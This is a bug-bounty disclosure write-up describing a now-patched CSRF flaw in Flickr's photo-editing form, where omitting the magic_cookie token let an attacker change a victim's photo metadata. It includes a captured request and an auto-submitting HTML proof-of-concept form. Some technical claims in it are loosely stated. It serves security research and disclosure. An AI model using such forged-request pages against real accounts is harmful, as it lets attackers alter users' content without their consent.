Exploiting XSRF on Flickr to Change Photo Details

Introduction

Two months ago, I discovered a vulnerability on Flickr, one of the most popular photo-sharing platforms at the time. Given Flickr’s significance and Yahoo’s bug bounty program, I decided to investigate potential security flaws and report any findings.

After analyzing the website, I found that it was built in PHP and had over 87 million users. Since Flickr is designed for photo sharing, I focused my research on how user-generated content and metadata are handled. Through this exploration, I successfully uncovered an XSRF vulnerability that allowed unauthorized changes to photo details.

Initial Recon and Methodology

I started testing common web vulnerabilities, including:

• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (XSRF/CSRF)
• Permission bypasses

Ultimately, I concentrated on XSRF, as Flickr implemented a security mechanism known as magic_cookie to prevent XSRF attacks. My goal was to find a way to bypass this protection.

The Vulnerability

Flickr uses magic_cookie, a session-based parameter included in every request, to protect against XSRF. To test its robustness, I targeted critical actions like delete, add, and edit.

Targeted Endpoint

After uploading a photo on the basic version of Flickr, the user is redirected to a page where they can modify the photo’s metadata (title, description, tags, etc.). The HTTP request looks like this:

POST /somewhere HTTP/1.1
Host: www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Long one !!!
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 208

edit_done=1&upload_ids=14401638983&just_photo_ids=&set_id=
&magic_cookie=32e285e98bbef3aa6afd8c879891c01b&title_14401638983=XSRF+bug+POC1
&description_14401638983=XSRF+bug+POC1&tags_14401638983=XSRF+POC1
&tags_14401638983=XSRF+POC2&Submit=SAVE

The magic_cookie value (32e285e98bbef3aa6afd8c879891c01b) appears to be an MD5 hash, a common security token format.

Breaking the Protection

I tested various approaches to bypass magic_cookie, including:

1. Using expired magic_cookie values (failed)
2. Modifying the magic_cookie to other session-based hashes (failed)
3. Removing the magic_cookie parameter entirely

When I removed the magic_cookie, I encountered a 302 redirect, but the content remained unchanged. After further testing, I found that removing the parameter twice in quick succession successfully allowed me to modify the photo’s details without authentication.

This meant that an attacker could modify photo metadata without user consent by simply removing the security token from the request.

Exploitation & Proof of Concept (PoC)

After confirming the vulnerability, I created an HTML proof-of-concept (PoC) to demonstrate the attack. The attacker needs to know the photo ID, which is easily obtainable from the photo’s URL.

Crafting the Exploit

I needed to change the photo ID in the HTML script upload_ids & tags_{id here} & title_{id here} & description_{id here}. An attacker could craft a malicious webpage containing the following XSRF payload:

<html>
  <body>
    <form action="https://www.flickr.com/somewhere" method="POST">
      <input type="hidden" name="edit_done" value="1">
      <input type="hidden" name="upload_ids" value="14401638983">
      <input type="hidden" name="title_14401638983" value="Hacked Photo">
      <input type="hidden" name="description_14401638983" value="XSRF Exploit Success">
      <input type="hidden" name="tags_14401638983" value="hacked, XSRF">
      <input type="submit" value="Submit Request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

When a victim (logged into Flickr) visits the attacker’s website, the script automatically submits the form, modifying the victim’s photo metadata without their knowledge.

Responsible Disclosure

Realizing the severity of the issue, I immediately reported it to Yahoo’s Bug Bounty Program via HackerOne. I initially feared that my report might be a duplicate, but within two days, I received a response acknowledging the issue.

Rapid Fix and Yahoo’s Response

Yahoo quickly patched the vulnerability within 12 hours, showcasing their efficiency in handling security reports. However, I did not receive a bounty decision until over a month later.

After waiting, I reached out to Yahoo via Twitter, and they granted me permission to publish this write-up.

Video Proof of Concept

For a detailed demonstration, watch the PoC video:

Conclusion

This vulnerability highlighted a critical XSRF flaw in Flickr’s photo management system, which allowed unauthorized modification of user content.

I appreciate Yahoo’s swift response in fixing the issue and their transparency in handling the report. Bug bounty programs continue to play a vital role in securing major platforms.